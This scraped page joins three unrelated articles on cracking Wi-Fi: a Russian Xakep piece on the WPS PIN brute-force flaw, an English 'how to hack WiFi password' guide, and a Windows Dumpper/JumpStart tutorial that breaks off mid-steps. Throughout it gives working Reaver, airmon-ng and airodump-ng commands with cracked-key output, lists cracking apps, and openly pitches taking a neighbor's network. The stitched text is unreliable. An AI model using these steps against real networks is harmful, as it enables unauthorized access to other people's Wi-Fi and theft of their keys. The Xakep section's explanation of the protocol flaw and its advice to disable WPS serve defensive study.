Wps взлом через windows

Время на прочтение12 мин

Количество просмотров1.5M

Еще не так давно казалось, что беспроводная сеть, защищенная с помощью технологии WPA2, вполне безопасна. Подобрать простой ключ для подключения действительно возможно. Но если установить по-настоящему длинный ключ, то сбрутить его не помогут ни радужные таблицы, ни даже ускорения за счет GPU. Но, как оказалось, подключиться к беспроводной сети можно и без этого — воспользовавшись недавно найденной уязвимостью в протоколе WPS.

Цена упрощений

Открытых точек доступа, к которым вообще не надо вводить ключ для подключения, становится все меньше и меньше. Кажется, что скоро их можно будет занести в Красную книгу. Если раньше человек мог даже и не знать, что беспроводную сеть можно закрыть ключом, обезопасив себя от посторонних подключений, то теперь ему все чаще подсказывают о такой возможности. Взять хотя бы кастомные прошивки, которые выпускают ведущие провайдеры для популярных моделей роутеров, чтобы упростить настройку. Нужно указать две вещи — логин/пароль и… ключ для защиты беспроводной сети. Что еще более важно, сами производители оборудования стараются сделать процесс настройки незамысловатым. Так, большинство современных роутеров поддерживают механизм WPS (Wi-Fi Protected Setup). С его помощью пользователь за считанные секунды может настроить безопасную беспроводную сеть, вообще не забивая себе голову тем, что «где-то еще нужно включить шифрование и прописать WPA-ключ». Ввел в системе восьмизначный символьный PIN, который написан на роутере, – и готово! И вот здесь держись крепче. В декабре сразу два исследователя рассказали о серьезных фундаментальных прорехах в протоколе WPS. Это как черный ход для любого роутера. Оказалось, что если в точке доступа активирован WPS (который, на минуточку, включен в большинстве роутеров по умолчанию), то подобрать PIN для подключения и извлечь ключ для подключения можно за считанные часы!

Как работает WPS?

Задумка создателей WPS хороша. Механизм автоматически задает имя сети и шифрование. Таким образом, пользователю нет необходимости лезть в веб-интерфейс и разбираться со сложными настройками. А к уже настроенной сети можно без проблем добавить любое устройство (например, ноутбук): если правильно ввести PIN, то он получит все необходимые настройки. Это очень удобно, поэтому все крупные игроки на рынке (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) сейчас предлагают беспроводные роутеры с поддержкой WPS. Разберемся чуть подробнее.
Существует три варианта использования WPS:

  1. Push-Button-Connect (PBC). Пользователь нажимает специальную кнопку на роутере (хардварную) и на компьютере (софтварную), тем самым активируя процесс настройки. Нам это неинтересно.
  2. Ввод PIN-кода в веб-интерфейсе.Пользователь заходит через браузер в административный интерфейс роутера и вводит там PIN-код из восьми цифр, написанный на корпусе устройства (рисунок 1), после чего происходит процесс настройки. Этот способ подходит скорее для первоначальной конфигурации роутера, поэтому мы его рассматривать тоже не будем.

    Рисунок 1. PIN-код WPS, написанный на корпусе роутера
  3. Ввод PIN-кода на компьютере пользователя (рисунок 2).
    При соединении с роутером можно открыть специальную сессию WPS, в рамках которой настроить роутер или получить уже имеющиеся настройки, если правильно ввести PIN-код. Вот это уже привлекательно. Для открытия подобной сессии не нужна никакая аутентификация. Это может сделать любой желающий! Получается, что PIN-код уже потенциально подвержен атаке типа bruteforce. Но это лишь цветочки.

    Рисунок 2. Окно для ввода PIN-кода WPS

Уязвимость

Как я уже заметил ранее, PIN-код состоит из восьми цифр — следовательно, существует 10^8 (100 000 000) вариантов для подбора. Однако количество вариантов можно существенно сократить. Дело в том, что последняя цифра PIN-кода представляет собой некую контрольную сумму, которая высчитывается на основании семи первых цифр. В итоге получаем уже 10^7 (10 000 000) вариантов. Но и это еще не все! Далее внимательно смотрим на устройство протокола аутентификации WPS (рисунок 3). Такое ощущение, что его специально проектировали, чтобы оставить возможность для брутфорса. Оказывается, проверка PIN-кода осуществляется в два этапа. Он делится на две равные части, и каждая часть проверяется отдельно!

Рисунок 3. Протокол аутентификации WPS

Посмотрим на схему:

  1. Если после отсылки сообщения M4 атакующий получил в ответ EAP-NACK, то он может быть уверен, что первая часть PIN-кода неправильная.
  2. Если же он получил EAP-NACK после отсылки M6, то, соответственно, вторая часть PIN-кода неверна. Получаем 10^4 (10 000) вариантов для первой половины и 10^3 (1 000) для второй. В итоге имеем всего лишь 11 000 вариантов для полного перебора. Чтобы лучше понять, как это будет работать, посмотри на схему.
  3. Важный момент — возможная скорость перебора. Она ограничена скоростью обработки роутером WPS-запросов: одни точки доступа будут выдавать результат каждую секунду, другие — каждые десять секунд. Основное время при этом затрачивается на расчет открытого ключа по алгоритму Диффи-Хеллмана, он должен быть сгенерирован перед шагом M3. Затраченное на это время можно уменьшить, выбрав на стороне клиента простой секретный ключ, который в дальнейшем упростит расчеты других ключей. Практика показывает, что для успешного результата обычно достаточно перебрать лишь половину всех вариантов, и в среднем брутфорс занимает всего от четырех до десяти часов.

Рисунок 4. Блок-схема брутфорса PIN-кода WPS

Первая реализация

Первой появившейся реализацией брутфорса стала утилита wpscrack, написанная исследователем Стефаном Фибёком на языке Python. Утилита использовала библиотеку Scapy, позволяющую инъектировать произвольные сетевые пакеты. Сценарий можно запустить только под Linux-системой, предварительно переведя беспроводной интерфейс в режим мониторинга. В качестве параметров необходимо указать имя сетевого интерфейса в системе, MAC-адрес беспроводного адаптера, а также MAC-адрес точки доступа и ее название (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004 # found 1st half of PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds
<...>
trying 18674095 # found 2st half of PIN
<...>
Network Key:
0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_really_lo
0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ng_wpa_passphras
0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac
0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65 king_this_one
<...>

Как видишь, сначала была подобрана первая половина PIN-кода, затем — вторая, и в конце концов программа выдала готовый к использованию ключ для подключения к беспроводной сети. Сложно представить, сколько времени потребовалось бы, чтобы подобрать ключ такой длины (61 символ) ранее существовавшими инструментами. Впрочем, wpscrack не единственная утилита для эксплуатации уязвимости, и это довольно забавный момент: в то же самое время над той же самой проблемой работал и другой исследователь — Крейг Хеффнер из компании Tactical Network Solutions. Увидев, что в Сети появился работающий PoC для реализации атаки, он опубликовал свою утилиту Reaver. Она не только автоматизирует процесс подбора WPS-PIN и извлекает PSK-ключ, но и предлагает большее количество настроек, чтобы атаку можно было осуществить против самых разных роутеров. К тому же она поддерживает намного большее количество беспроводных адаптеров. Мы решили взять ее за основу и подробно описать, как злоумышленник может использовать уязвимость в протоколе WPS для подключения к защищенной беспроводной сети.

HOW-TO

Как и для любой другой атаки на беспроводную сеть, нам понадобится Linux. Тут надо сказать, что Reaver присутствует в репозитории всеми известного дистрибутива BackTrack, в котором к тому же уже включены необходимые драйвера для беспроводных устройств. Поэтому использовать мы будем именно его.

Шаг 0. Готовим систему
На официальном сайте BackTrack 5 R1 доступен для загрузки в виде виртуальной машины под VMware и загрузочного образа ISO. Рекомендую последний вариант. Можно просто записать образ на болванку, а можно с помощью программы UNetbootin сделать загрузочную флешку: так или иначе, загрузившись с такого носителя, мы без лишних заморочек сразу будем иметь систему, готовую к работе.

Шаг 1. Вход в систему
Логин и пароль для входа по умолчанию – root:toor. Оказавшись в консоли, можно смело стартовать «иксы» (есть отдельные сборки BackTrack — как с GNOME, так и KDE):

$ startx

Шаг 2. Установка Reaver
Чтобы загрузить Reaver, нам понадобится интернет. Поэтому подключаем патчкорд или настраиваем беспроводной адаптер (меню «Applications > Internet > Wicd Network Manager»). Далее запускаем эмулятор терминала, где загружаем последнюю версию утилиты через репозиторий:

$ apt-get update
$ apt-get install reaver

Тут надо сказать, что в репозитории находится версия 1.3, которая лично у меня заработала неправильно. Поискав информацию о проблеме, я нашел пост автора, который рекомендует обновиться до максимально возможной версии, скомпилировав исходники, взятые из SVN. Это, в общем, самый универсальный способ установки (для любого дистрибутива).

$ svn checkout reaver-wps.googlecode.com/svn/trunk reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
$ make install

Никаких проблем со сборкой под BackTrack не будет — проверено лично. В дистрибутиве Arch Linux, которым пользуюсь я, установка производится и того проще, благодаря наличию соответствующего PKGBUILD’а:

$ yaourt -S reaver-wps-svn

Рисунок 5. Пример работы брутфорcа Reaver

Шаг 3. Подготовка к брутфорсу
Для использования Reaver необходимо проделать следующие вещи:

  • перевести беспроводной адаптер в режим мониторинга;
  • узнать имя беспроводного интерфейса;
  • узнать MAC-адрес точки доступа (BSSID);
  • убедиться, что на точке активирован WPS.

Для начала проверим, что беспроводной интерфейс вообще присутствует в системе:

$ iwconfig

Если в выводе этой команды есть интерфейс с описанием (обычно это wlan0) – значит, система распознала адаптер (если он подключался к беспроводной сети, чтобы загрузить Reaver, то лучше оборвать подключение). Переведем адаптер в режим мониторинга:

$ airmon-ng start wlan0

Эта команда создает виртуальный интерфейс в режиме мониторинга, его название будет указано в выводе команды (обычно это mon0). Теперь нам надо найти точку доступа для атаки и узнать её BSSID. Воспользуемся утилитой для прослушки беспроводного эфира airodump-ng:

$ airodump-ng mon0

На экране появится список точек доступа в радиусе досягаемости. Нас интересуют точки с шифрованием WPA/WPA2 и аутентификацией по ключу PSK. Лучше выбирать одну из первых в списке, так как для проведения атаки желательна хорошая связь с точкой. Если точек много и список не умещается на экране, то можно воспользоваться другой известной утилитой — kismet, там интерфейс более приспособлен в этом плане. Опционально можно на месте проверить, включен ли на нашей точке механизм WPS. Для этого в комплекте с Reaver (но только если брать его из SVN) идет утилита wash:

$ ./wash -i mon0

В качестве параметра задается имя интерфейса, переведенного в режим мониторинга. Также можно использовать опцию ‘-f’ и скормить утилите .cap файл, созданный, например, тем же airodump-ng. По непонятной причине в пакет Reaver в BackTrack не включили утилиту wash. Будем надеяться, к моменту публикации статьи эту ошибку исправят.

Шаг 4. Запускаем брутфорс
Теперь можно приступать непосредственно к перебору PIN’а. Для старта Reaver в самом простом случае нужно немного. Необходимо лишь указать имя интерфейса (переведенного нами ранее в режим мониторинга) и BSSID точки доступа:

$ reaver -i mon0 -b 00:21:29:74:67:50 -vv

Ключ «-vv» включает расширенный вывод программы, чтобы мы могли убедиться, что все работает как надо.

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50 (ESSID: linksys)
[+] Trying pin 63979978

Если программа последовательно отправляет PIN’ы точке доступа, значит, все завелось хорошо, и остается тупо ждать. Процесс может затянуться. Самое короткое время, за которое мне удалось сбрутфорсить PIN, составило примерно пять часов. Как только он будет подобран, программа радостно об этом сообщит:

[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCarrot!'
[+] AP SSID: 'linksys'

Самое ценное здесь — это, конечно же, ключ WPA-PSK, который сразу же можно использовать для подключения. Все так просто, что даже не укладывается в голове.

Рисунок 6. Reaver Pro — железка от создателей Reaver

Можно ли защититься?

Защититься от атаки можно пока одним способом — отключить нафиг WPS в настройках роутера. Правда, как оказалось, сделать это возможно далеко не всегда. Поскольку уязвимость существует не на уровне реализации, а на уровне протокола, ждать от производителей скорого патча, который решил бы все проблемы, не стоит. Самое большее, что они могут сейчас сделать, – это максимально противодействовать брутфорсу. Например, если блокировать WPS на один час после пяти неудачных попыток ввода PIN-кода, то перебор займет уже около 90 дней. Но другой вопрос, насколько быстро можно накатить такой патч на миллионы устройств, которые работают по всему миру?


Прокачиваем Reaver

В HOWTO мы показали самый простой и наиболее универсальный способ использования утилиты Reaver. Однако реализация WPS у разных производителей отличается, поэтому в некоторых случаях необходима дополнительная настройка. Ниже я приведу дополнительные опции, которые могут повысить скорость и эффективность перебора ключа.

  1. Можно задать номер канала и SSID точки доступа:
    # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Благотворно сказывается на скорости брутфорса опция ‘—dh-small’, которая задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки доступа:
    # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
  3. Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить:
    # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена:
    # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Некоторые точки доступа могут блокировать WPS на определенное время, заподозрив, что их пытаются поиметь. Reaver эту ситуацию замечает и делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять:
    # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Некоторые реализации протокола WPS разрывают соединение при неправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция ‘—nack’:
    # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Опция ‘—eap-terminate’ предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения EAP FAIL:
    # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
  8. Возникновение ошибок в WPS-сессии может означать, что АР ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. Информация об этом будет отображаться на экране. В этом случае Reaver приостанавливает свою деятельность, причем время паузы может быть задано с помощью опции ‘—fail-wait’:
    # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

FAQ

Вопрос: Какой беспроводной адаптер нужен для взлома?
Ответ: Перед тем как экспериментировать, нужно убедиться, что беспроводной адаптер может работать в режиме мониторинга. Лучший способ — свериться со списком поддерживаемого оборудования на сайте проекта Aircrack-ng (bit.ly/wifi_adapter_list). Если же встанет вопрос о том, какой беспроводный модуль купить, то начать можно с любого адаптера на чипсете RTL8187L. USB’шные донглы легко найти в интернете за 20$.

Вопрос: Почему у меня возникают ошибки «timeout» и «out of order»?
Ответ: Обычно это происходит из-за низкого уровня сигнала и плохой связи с точкой доступа. Кроме того, точка доступа может на время заблокировать использование WPS.

Вопрос: Почему у меня не работает спуфинг MAC-адреса?
Ответ: Возможно, ты спуфишь MAC виртуального интерфейса mon0, а это работать не будет. Надо указывать имя реального интерфейса, например, wlan0.

Вопрос: Почему при плохом сигнале Reaver работает плохо, хотя тот же взлом WEP проходит нормально?
Ответ: Обычно взлом WEP происходит путем повторной пересылки перехваченных пакетов, чтобы получить больше векторов инициализации (IV), необходимых для успешного взлома. В этом случае неважно, потерялся какой-либо пакет, либо как-то был поврежден по пути. А вот для атаки на WPS необходимо строгое следование протоколу передачи пакетов между точкой доступа и Reaver для проверки каждого PIN-кода. И если при этом какой-то пакет потеряется, либо придет в непотребном виде, то придется заново устанавливать WPS-сессию. Это делает атаки на WPS гораздо более зависимыми от уровня сигнала. Также важно помнить, что если твой беспроводной адаптер видит точку доступа, то это ещё не значит, что и точка доступа видит тебя. Так что если ты являешься счастливым обладателем высокомощного адаптера от ALFA Network и антенны на пару десятков dBi, то не надейся, что получится поломать все пойманные точки доступа.

Вопрос: Reaver все время посылает точке доступа один и тот же PIN, в чем дело?
Ответ: Проверь, активирован ли на роутере WPS. Это можно сделать при помощи утилиты wash: запусти её и проверь, что твоя цель находится в списке.

Вопрос: Почему я не могу ассоциироваться с точкой доступа?
Ответ: Это может быть из-за плохого уровня сигнала или потому, что твой адаптер непригоден для подобных изысканий.

Вопрос: Почему я постоянно получаю ошибки «rate limiting detected»?
Ответ: Это происходит потому, что точка доступа заблокировала WPS. Обычно это временная блокировка (около пяти минут), но в некоторых случаях могут влепить и перманентный бан (разблокировка только через административную панель). Есть один неприятный баг в Reaver версии 1.3, из-за которого не определяются снятия подобных блокировок. В качестве воркэраунда предлагают использовать опцию ‘—ignore-locks’ или скачать последнюю версию из SVN.

Вопрос: Можно ли одновременно запустить два и более экземпляров Reaver для ускорения атаки?
Ответ: Теоретически можно, но если они будут долбить одну и ту же точку доступа, то скорость перебора едва ли увеличится, так как в данном случае она ограничивается слабым железом точки доступа, которое уже при одном атакующем загружается по полной.


Экспресс-курс по взлому Wi-Fi

  1. WEP (Wired Equivalent Privacy). Самая первая технология для защиты беспроводной сети оказалась крайне слабой. Взломать ее можно буквально за несколько минут, используя слабости применяемого в ней шифра RC4. Основными инструментами здесь служат снифер airodump-ng для сбора пакетов и утилита aircrack-ng, используемая непосредственно для взлома ключа. Также существует специальная тулза wesside-ng, которая вообще взламывает все близлежащие точки с WEP в автоматическом режиме.
  2. WPA/WPA2 (Wireless Protected Access). Перебор — это единственный способ подобрать ключ для закрытой WPA/WPA2 сети (да и то исключительно при наличии дампа так называемого WPA Handshake, который передается в эфир при подключении клиента к точке доступа). Брутфорс может затянуться на дни, месяцы и годы. Для увеличения эффективности перебора сначала использовались специализированные словари, потом были сгенерированы радужные таблицы, позже появились утилиты, задействовавшие технологии NVIDIA CUDA и ATI Stream для аппаратного ускорения процесса за счет GPU. Используемые инструменты — aircrack-ng (брутфорс по словарю), cowpatty (с помощью радужных таблиц), pyrit (с использованием видеокарты).

Журнал Хакер, Март (03) 158
Автор: pkruglov (ivinside.blogspot.com)

Полистать этот материал в журнальной верстке можно здесь.

Подпишись на «Хакер»

  • 1 999 р. за 12 номеров бумажного варианта
  • 1249р. за годовую подписку на iOS/iPad (релиз Android’а скоро!)
  • «Хакер» на Android

We all at some point in time might’ve thought about hacking our neighbor’s WiFi and using their internet sneakily. Like really it’s kinda fun getting free WiFi right? Especially in the range of our comfy private room, nothing would beat that. Or maybe you got to take control of your own WiFi whose password you can’t remember. Either way, do you think you could actually do that if you knew the technical operations? Assuming you know a thing or two about the technicalities of your smartphone and computers. Today’s article is going to be very interesting for you as we’re here to provide some actual methods on how to hack WiFi password which might just do the trick if things are how they should be and you do them right. Anyway, let’s understand the nitty-gritty details about how such operations actually take place. So, continue reading to know how to hack WiFi password using Android phone or PC.

How to Hack WiFi Password

Table of Contents

Wireless Fidelity is an alternative name for Wifi. WiFi is a common technology that may be found on computers, mobile devices, and other places that enable WiFi. In order to connect wirelessly to a network, another computer, or a mobile device, one must use WiFi networking technology. In WiFi, data is sent via a circular radio frequency spectrum. With no wires or connections required, WiFi functions like a local area network. WiFi local area network is known as WLAN. Communication is governed by IEEE 802.11. Physical Data Link Layer (PDLL) is a technology that WiFi uses to function. All contemporary computer gadgets, including digital cameras, smart TVs, mobile phones, and laptops, have WiFi capabilities. A 2.4 GHz bandwidth is the standard for all devices. WiFi comes in a variety of forms or standards, as was already noted. The standards’ names are defined here:

  • WiFi-1 (802.11b, released in 1999) (802.11b, launched in 1999) – This version features a 2.4 GHz frequency band connection speed of 2 Mb/s to 11 Mb/s.
  • In 1999, WiFi-2 (802.11a) was introduced. The previous version, 802.11a, which offers up to 54 Mb/s connection speed across the 5 GHz band, was launched after a month.
  • In 2003, WiFi-3 (802.11g) was introduced. In this edition, the 2.4 GHz speed was increased to 54 to 108 Mb/s.
  • Launched in 2004, 802.11i. This is comparable to 802.11g, except this version just adds a security feature.
  • In 2004, 802.11e was released. Only Voice over Wireless LAN and multimedia streaming are supported. Otherwise, it is the same as 802.11g.
  • 2009 saw the release of WiFi-4 (802.11n). This model supports both 2.4 GHz and 5 GHz wireless bands and offers speeds of up to 72 to 600 Mb/s.
  • 2014 saw the release of WiFi 5 (802.11ac). It provides a 5 GHz band speed of 1733 Mb/s.

An electromagnetic wave-based wireless communication technology called WiFi transmits networks. Radiofrequency is used in WiFi since there are different types of electromagnetic waves dependent on their frequency. The following elements make up how wifi works:

  • Host network: The router’s primary host network, also known as the base station network or Ethernet (802.3) connection, is where it obtains its network connection.
  • Access point or router: Network bridges join wired and wireless networks. They are often referred to as access points or routers. Accepting a wired Ethernet connection, the wired connection is transformed into a wireless connection, which is then broadcast via radio waves.
  • Accessing Tool: Information may be accessed in a variety of ways. We connect to WiFi and browse the web via WiFi from our phones, computer, and other devices.

WiFi, often known as wireless LAN, is referred to as:

  • Service set identifier (SSID) which is basically a string of 32 characters is used to identify and separate WiFi networks from one another. Every device attempts to communicate with the same SSID (Service Set Identifier). The name of the wireless network is abbreviated as SSID, which stands for Service Set Identifier.
  • WiFi Protected Access-Pre-Shared Key (WPA-PSK) is a program developed by the WiFi Alliance Authority to secure wireless networks. There are three types of WPA: WPA, WPA2, and WPA3. This is a WiFi signal encryption technique to block unauthorized users.
  • WiFi uses ad hoc networks to transport information. It’s a wireless mesh network, which is a point-to-point system without an interface.

WPA authenticates users using a 256-bit pre-shared key or passphrase. Short passwords are susceptible to dictionary attacks and other password-cracking techniques. To breach WPA keys, utilize the following WiFi hacker internet resources:

  • CowPatty: Using a brute force approach, this WiFi password cracking program can break pre-shared keys (PSK).
  • Cain and Abel: You may decode capture files from other sniffer applications like Wireshark with this WiFi hacker for PC utility. WEP or WPA-PSK encoded frames might be present in the capture files.

So now that we know about all the important stuff about WiFi. Let’s proceed to the methods of hacking them.

Method 1: Through Windows Command Prompt

One of the basic ways how to hack WiFi passwords if you were already connected to them once, is possible through your very own laptop or desktop. To do so, follow the steps below:

1. Press the Start menu on your PC keyboard and type Command Prompt in the search bar. Click on Run as administrator.

command prompt run as administrator

2. In the Command Prompt window, type the given command and press Enter key.

netsh wlan show profile

netsh wlan show profile command. How to Hack WiFi Password

3. This will lay out all the saved Wifi connections under the User profile heading that your PC had connected to till date, locate the name of the Wifi you want password for and paste the following command and hit Enter key.

netsh wlan show profile name="XXXXXXXX" key=clear

Note: Insert the Xs with the name of your Wifi, FD-63 in my case is considered as an example.

command. How to Hack WiFi Password

4. All the details about the wireless connection including its password will be displayed under the Security settings and the password will be beside the Key content section.

security settings. How to Hack WiFi Password

5. This way the password can be gathered from a previously connected Wifi.

Also Read: 18 Best Tools for Hacking

Method 2: Through Cain and Abel Application (On PC)

By using the Cain and Abel application on your PC whose download link is mentioned above you can hack the passwords. To understand how to hack Wifi password through this method, follow the steps below:

1. Open the downloaded application.

Cain and Abel

2. Click on the Decoders tab on the top left of the tab list.

3. Now, click on the Wireless Passwords options from the left panel and click on the blue + icon from the options above the tab list.

4. After this, all the wireless networks your PC has connected with previously will show up in the front panel where the name of your Wifi will be present somewhere under the SSID column and its password will be just beside it under the Password column.

5. Locate your required Wifi and gather its password.

Method 3: Hack Passwords of WPA2 WPS WiFi Routers (On Android)

This is another Wifi hacking operation that can be possible through Bcmon and Reaver Android apps. But you must have a rooted phone. So if not, do so to follow this method. Also, be sure that your phones possess the Broadcom bcm4329 or bcm4330 chipsets that are present in Samsung Galaxy S1/S2, HTC Desire HD, Nexus 7, Nexus 1, etc. Let’s proceed to the steps as follows to hack WiFi password using Android phone.

1. Open the Bcmon app on your phone and tap on the monitor mode option.

2. Keep the app running in the background and again go to your phone’s menu and launch the Reaver app.

3. Here a popup will come up asking to confirm that you aren’t using the app for any illegal activity, tap on the Confirm option and proceed.

4. Now tap on the APN which is the network you want to hack.

Note: If you don’t see the desired networks, switch back to the Bcmon app and check whether the monitor mode you tapped on in the first step is still active, if not, tap on it again to activate it.

5. Tap on Settings in the Reaver app and select the box beside the Automatic Advanced setting option.

6. Now tap on the start attack option on the main screen of the app to hack the Wifi.

7. The WiFi will probably get hacked in 2-10 hours.

Also Read: How To Quickly Hack Xfinity WiFi Hotspots?

Method 4: Through WPSApp (On Android)

The WPSApp is another Wifi hacking app that helps in hacking any password nearby by providing an 8-digit PIN to the networks. It usually provides sure shot crack for [WPA-PSK]+[WPS] encrypted Wifis (shown by green tick mark beside them) and various trial and error PINs for [WPA2-PSK]+[WPS] type of security (shown by white question marks beside them) while no hack for [WPA2-PSK] advanced security Wifis (red cross beside them). To understand how to hack Wifi password using Android phone through this app, follow the steps below:

1. Open the app and search for the Wifi networks in your phone’s range by pressing on the two arrows on the top right of the phone screen.

Note: In this step, the app will pop-up asking for your phone’s Wifi access and location access. Do grant the permission according to your preferences from the options that can be changed in the future by going to the phone’s Settings for the app.

2. After the listing of the Wifi connections appears, tap on your desired Wifi network you want to hack which should be marked by a tick or a question mark icon beside it.

3. Now tap on the CONNECT WITH KEY option for the Wifi connection and wait for some seconds.

4. The app will display the network’s password automatically in some time.

Method 5: Through AndroDumper App (On Android)

You can also hack Wifi passwords through the AndroDumpper app which had been one of the famous apps for this operation. To do so, download the app and follow the steps below:

1. Turn on your phone’s Wifi and launch the AndroidDumpper app.

2. Tap on the two arrows on the top right of the app to refresh the search for nearby Wifi devices.

3. Find your desired Wifi and tap on the TRY CONNECT option to start hacking it.

4. The app will hack the network faster and pretty successfully if the password is less complex.

Method 6: Through WIFI WPS WPA TESTER App (On Android)

A good and effective hacking can be possible through the Wi-Fi WPS WPA TESTER app that can hack routers with outdated security and probably a WPS router. The app comes with a free and premium version separately. To get effective results, you should go with the premium version which is probably very cheap. To understand how to hack Wifi password using Android phone with this app, download it through the link above and follow the steps below:

1. Open the Wi-Fi WPS WPA TESTER app and turn on your phone’s Wifi.

2. Tap on the Scan option and search for your desired Wifi from the list.

3. Tap on your desired Wifi and then tap on the Password option on the bottom right to hack.

4. The app will detect and provide the security status of the connection, if the security type is vulnerable, the password will show up.

Also Read: How to Hack Any Game on Android

Method 7: Through WiFi WPS Connect App

To hack all the WPS-secured WiFis, this app WiFi WPS Connect is one app of its kind. The app can bypass WPS security without any password and mostly works good on rooted phones. To hack through this app, download it from the link provided above and follow the steps below:

1. Turn on the WiFi and open the WiFi WPS Connect app.

2. Tap on the two arrows on the top right of the app to refresh the search for nearby connections.

3. After successfully loading all the nearby devices and their basic details below them, tap on the desired WiFi you want to hack.

4. A pop-up will appear about the Wifi security and CONNECT WITH PIN, CONNECT WITH KEY and other options below it.

5. Try one by one by clicking on both options and the WiFi password will appear in some minutes.

Recommended:

  • How to Configure Surround PhysX Configuration
  • How to Check If You Have a Warrant
  • How to Hack Instagram
  • Fix My Wifi Extender Keeps Disconnecting

Above were some of the methods about how to hack WiFi password through various apps and programs. Remember, we don’t promote the misuse of any of these methods and the above should be done under expert surveillance or for study purposes. Any other complexities are solely your responsibility. Hope this article on how to hack WiFi password using Android phone or PC helped you in some way. Do share your feedback in the comment section below, and also do share your experiences and which app and method worked for you. Keep reading and we’ll see you in another article with another topic.

In today’s world, Wi-Fi or internet connectivity has become an essential part of our lives. It is almost impossible to survive without it. But, what if you are in a place where Wi-Fi is not accessible? In such cases, you might be tempted to crack Wi-Fi passwords, but that’s not the right way to go about it. Windows operating systems are not designed for hacking purposes, unlike Linux, which is open source and provides a wide variety of tools for hackers and penetration testers. 

 

So, if you want to crack Wi-Fi passwords, which operating system should you use? Both Linux and Windows can be used, but Linux is preferred due to its flexibility and range of tools. However, many people find Linux difficult to use, and they give up quickly. If you are one of them, don’t worry! There are windows applications such as Dumpper and JumpStart that can help you crack WPA/WPA2 WPS enabled networks. These applications can crack WPS pins, allowing you to connect to any WPS enabled network easily. This is one of the easiest and best ways to crack Wi-Fi WPA/WPA2 WPS enabled routers. Additionally, if you want to try hacking through your Android mobile, there is a simple method that can help you crack Wi-Fi WPA WPS enabled networks in just 2 minutes.. Refer to Hacking Wifi using your android mobiles
easily in 2 mins 

THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS

What is WPA/WPA2

Wi-Fi Protected
Access
 (WPA) and Wi-Fi Protected Access II (WPA2) are
two security protocols and security certification programs developed by
the Wi-Fi Alliance to secure wireless computer networks. The Alliance
defined these in response to serious weaknesses researchers had found in the
previous system, WEP (Wired Equivalent Privacy).

A flaw in a feature added to Wi-Fi,
called Wi-Fi Protected Setup, allows WPA and WPA2 security to be bypassed
and effectively broken in many situations.
 WPA and WPA2 security implemented without using the Wi-Fi
Protected Setup feature are unaffected by the security vulnerability.

WPA2 has
replaced WPA. WPA2, which requires testing and certification by the Wi-Fi
Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it
includes mandatory support for CCMP, an AES-based encryption mode
with strong security. Certification began in September, 2004; from March
13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi
trademark.

What Is WPS

Wi-Fi Protected
Setup (
WPS; originally Wi-Fi Simple Config) is a
network security standard that attempts to allow users to easily secure a 
wireless home network but could fall
to brute-force attacks 
if one or more of the network’s access points do not guard against
the attack.


Limitations

1.  This Hack works on Wpa/Wpa2 – Wps
Unlocked Networks only

2.  Does not work on all Routers & all
encryption’s, so cannot hack all the wifi networks Available near you. At least
this method can’t.

3.  Not all Networks or routers can be
hacked using this method.

4. While hacking some networks it says
«Wireless Configuration Failed » that means jumpstart (the software
that we are going to use to hack wifi password) cannot hack that network.

There are many people wondering about
hacking wifi networks. So, here is a simple tutorial on How to hack wifi Wpa
and Wpa2 security through Windows using dumpper and Jumpstart 

Requirements:

1)  

Laptop
or USB wifi Adapter

2)  

Windows Operating System

7)  

Wpa/Wpa2 – WPS Networks Available with at least 8% signal

Links to Download the Required Software’s

2)    
Download JumpStart 

4)     Download Dumpper 


Install all the applications in the order given above to avoid any unnecessary
errors.
Download and Install all the above
given Applications one by one, even If a single software installation is missed
(Except Dumpper), lot of errors might occur which might disable the
functionality of other software that might result in failure of hack. Be careful
while downloading and installing these software’s.

Tutorial on Hacking Wifi WPA/WAP2 — WPS in Windows Using JumpStart and Dumpper 

Tutorial To Hack Wifi WPA/WPA 2 — WPS Networks

1)  After
Downloading and Installing all the applications — Open Dumpper (No need of
Installing Dumper, Just run Dumpper when ever you want to try out this hack)

2) Select your Network
Adapter and click ”
Scan”. All the
available networks around will be shown below



3) You can see all the available Networks, Move to «WPS» tab and click «Scan» 

4) Select «All Networks«

5) click on ”Scan

6)  Select your «Network» that you want to hack 

7) Click on «JumpStart» after selecting the network that you want to hack

